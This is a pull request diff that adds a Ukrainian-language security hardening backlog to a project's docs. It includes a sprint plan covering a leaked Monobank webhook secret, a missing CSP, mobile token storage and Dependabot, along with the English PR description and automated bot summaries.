+| H5 — `H5-exp-trusted-origin.md` (Sprint 2)              | `exp://` як trusted origin у production                   | Open   | Sprint 2                  |
+| H6 — `H6-email-verification.md` (Sprint 2)              | Email verification disabled                               | Open   | Sprint 2                  |
+| H7 — `H7-vercel-config-drift.md` (Sprint 2)             | `vercel.json` SSOT drift                                  | Open   | Sprint 2                  |
+| H8 — `H8-corp-per-route.md` (Sprint 2)                  | Helmet `CORP: cross-origin` глобально                     | Open   | Sprint 2                  |
+| H9 — `H9-transcribe-usd-cap.md` (Sprint 2)              | Transcribe per-user USD-cap відсутній                     | Open   | Sprint 2                  |
+
+### Medium / Low / Informational
+
+Окремі картки з'являються у `sprint-2.md` … `sprint-4.md`. Повний список — у [Sprint roadmap](#spring-roadmap) вище.
+
+## Cross-references
+
+- [docs/security/vulnerability-sla.md](../vulnerability-sla.md) — SLA на реакцію + дедлайн усунення.
+- [docs/security/audit-exceptions.md](../audit-exceptions.md) — затверджені винятки з security findings.
+- [docs/governance/security-incident-policy.md](../../governance/security-incident-policy.md) — incident-policy.
+- [docs/audits/](../../audits/) — snapshot-аудити (НЕ ці картки).
+
+## Як працювати з цим беклогом
+
+1. **Беремо найвищий-severity Open-card** (Critical → High → Medium → Low) і ставимо у sprint.
+2. **Status: Open → In progress** + assignee у frontmatter картки.
+3. **Створюємо feature-branch + PR**. У PR-описі: `Closes docs/security/hardening/<ID>-<slug>.md`.
+4. **Після merge**: `Status: Closed` + дата + коментар «Resolved in PR #NNN».
+5. **Картка не видаляється** — лишається як historical record (як ADR).
+
+Картки можна додавати **тільки** через PR (один тимчасовий branch може додавати кілька карток одночасно). Severity — за CVSS v3.1 з product-context override (як у [vulnerability-sla.md](../vulnerability-sla.md)).

--- a/docs/security/hardening/sprint-1.md
+++ b/docs/security/hardening/sprint-1.md
@@ -1,0 +1,41 @@
+# Sprint 1 — Critical + найгірші High
+
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
+> **Status:** Active
+
+**Тривалість:** 1–2 тижні (target close: 2026-05-17).
+**Сумарний effort:** ~2.5 person-days.
+
+## Скоуп
+
+| ID                                          | Title                                                        | Severity | Effort | Owner    |
+| ------------------------------------------- | ------------------------------------------------------------ | -------- | ------ | -------- |
+| [C1](./C1-mono-webhook-secret-in-url.md)    | Mono webhook secret з URL → header + sanitize logs + rotate  | Critical | 1d     | backend  |
+| [C2](./C2-frontend-csp.md)                  | Додати CSP у `vercel.json` (Report-Only → Enforce)           | Critical | 0.5d   | frontend |
+| [H1](./H1-mobile-bearer-storage.md)         | Capacitor secure-storage AC + `android:allowBackup="false"`  | High     | 0.5d   | mobile   |
+| [H2](./H2-dependabot.md)                    | Створити `.github/dependabot.yml` (npm + actions + docker)   | High     | 0.5h   | devops   |
+
+## Чому саме ці чотири разом
+
+- **C1 + C2** — два Critical, обидва закривають **post-XSS / post-leak exfiltration paths**, які перетворюють локальну помилку у повний компроміс акаунту. Обидва дешеві у фіксі (header rename + JSON-rule).
+- **H1** — мобільний bearer тримається на default Keychain accessibility, що дозволяє iCloud-sync на чужий пристрій. Картка **залежить** від C1 у тому сенсі, що `bearer = ключ доступу до webhook-secrets` — поки C1 не закрите, leakage-шлях лишається відкритим.
+- **H2** — Dependabot — найдешевший single-shot win проти supply-chain (одна YAML, одне PR-апрув). Без нього всі решта sprint-ів — реактивні.
+
+## Що міряємо як «success»
+
+- C1: `grep -R "/api/mono/webhook/" Sentry|Loki|Railway-access-logs` за тиждень після rotation = **0 results** з валідним секретом.
+- C2: CSP-Report-Only працює > 5 днів у production без false-positive з нашого PostHog/Sentry/Vercel-аналітики; після цього → CSP-Enforce без regress.
+- H1: Manual test — встановити app на iPhone-A, зайти, вимкнути iCloud Keychain backup → зайти на iPhone-B з тим же AppleID → токен **не** sync-нувся (експеримент проводиться на тестовому акаунті).
+- H2: Перший Dependabot-PR з'явився протягом 7 днів, security-update auto-merge passed CI.
+
+## Залежності та ризики
+
+- C1 потребує **узгодження з Monobank** про новий webhook-URL формат (`X-Mono-Webhook-Secret` header). Якщо Monobank API не підтримує custom-headers — fallback на body-mode або path-mode з middleware-redaction.
+- C2 потребує продакшн-інвентаризації всіх 3rd-party-загрузок (PostHog, Sentry, Vercel Analytics, Stripe-якщо-є) перед написанням `connect-src`.
+- H1 не блокує реліз mobile shell, але вимагає **bump version** + новий store-submission (iOS App Store review = 1–3 дні).
+
+## Перехресні посилання
+
+- [README](./README.md) — індекс беклогу.
+- [docs/security/vulnerability-sla.md](../vulnerability-sla.md) — SLA для Critical = 24h на acknowledge + 14d на fix.
+- [docs/audits/2026-04-28-implementation-roadmap.md](../../audits/2026-04-28-implementation-roadmap.md) — попередній roadmap (для крос-контексту).


### PR DESCRIPTION
## Summary

Introduces `docs/security/hardening/` — a per-finding security backlog distinct from formal audit reports, organized by severity-driven sprints. The directory holds living "what is wrong, where, why, and how to fix it" cards for every issue surfaced by the deep security review; subsequent sprints will land in their own PRs.

This PR is **documentation-only** — no source code, infra, or workflow files are modified. Implementation PRs will reference these cards.

## Sprint 1 — Critical + High quick-wins

| ID | Title | Severity | Owner | Effort |
|---|---|---|---|---|
| [C1](docs/security/hardening/C1-mono-webhook-secret-in-url.md) | Monobank webhook secret in URL path leaks to logs | Critical | backend | 1 d |
| [C2](docs/security/hardening/C2-frontend-csp.md) | Frontend SPA missing Content-Security-Policy | Critical | frontend | 0.5 d |
| [H1](docs/security/hardening/H1-mobile-bearer-storage.md) | Mobile bearer in `@capacitor/preferences` without Keychain accessibility | High | mobile | 0.5 d |
| [H2](docs/security/hardening/H2-dependabot.md) | No Dependabot/Renovate; only reactive nightly-audit | High | devops | 0.5 d |

Total effort ≈ **2.5 person-days**.

## Why "hardening" and not "audit"

The repo already has `docs/security/audit-exceptions.md` and `docs/audits/` for one-shot audit reports (point-in-time deliverables). The new `docs/security/hardening/` directory is a **living backlog** of per-finding cards: each card is updated as work progresses (Open → In progress → Closed), referenced by implementation PRs, and reviewed on a 90-day cadence (180 days for cards in stable Closed state).

## Structure

```
docs/security/hardening/
├── README.md                              # backlog index + severity stats
├── sprint-1.md                            # this sprint's narrative
├── C1-mono-webhook-secret-in-url.md
├── C2-frontend-csp.md
├── H1-mobile-bearer-storage.md
└── H2-dependabot.md
```

Each finding card is structured as: severity / sprint / owner / effort / status / discovered → summary → affected files → evidence → impact → recommendation → correction points → verification → cross-references.

## What this PR does NOT do

- Does **not** implement any of the fixes — those will be separate PRs that reference the relevant card.
- Does **not** add CI rules — only `docs/security/README.md` is updated to link the new section.
- Does **not** rotate any secret or change any production configuration.

## Verification

- All new files include the canonical freshness header (`> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.`).
- `docs/security/README.md` linked to `hardening/README.md`.
- File tree compiles to a Prettier-clean `*.md`.

## Cross-references

- Source audit document (private): deep security review delivered separately.
- [`docs/security/vulnerability-sla.md`](../docs/security/vulnerability-sla.md) — SLA targets per severity.
- [`docs/security/audit-exceptions.md`](../docs/security/audit-exceptions.md) — exception ledger.


<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Adds a living security hardening backlog under `docs/security/hardening/` and seeds Sprint 1 with four Critical/High findings (C1, C2, H1, H2). Documentation-only; linked from the main security index.

- **New Features**
  - Created `docs/security/hardening/` with `README.md`, `sprint-1.md`, and per-finding cards: C1 (Monobank webhook secret in URL path), C2 (missing CSP for SPA), H1 (mobile bearer storage accessibility), H2 (missing `Dependabot`/`Renovate`).
  - Added a link to the backlog in `docs/security/README.md`; all new docs include freshness headers and serve as the source of truth for upcoming fix PRs.

<sup>Written for commit bf06f21c1d53bf39a6333a0b6484b3aca8815675. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->



<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Documentation**
  * Established security hardening backlog framework with formal vulnerability tracking and sprint-based remediation roadmap.
  * Added comprehensive documentation of identified security findings with detailed remediation guidance and success criteria.
  * Implemented operational workflow for vulnerability triage, assignment, and resolution tracking across product components.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->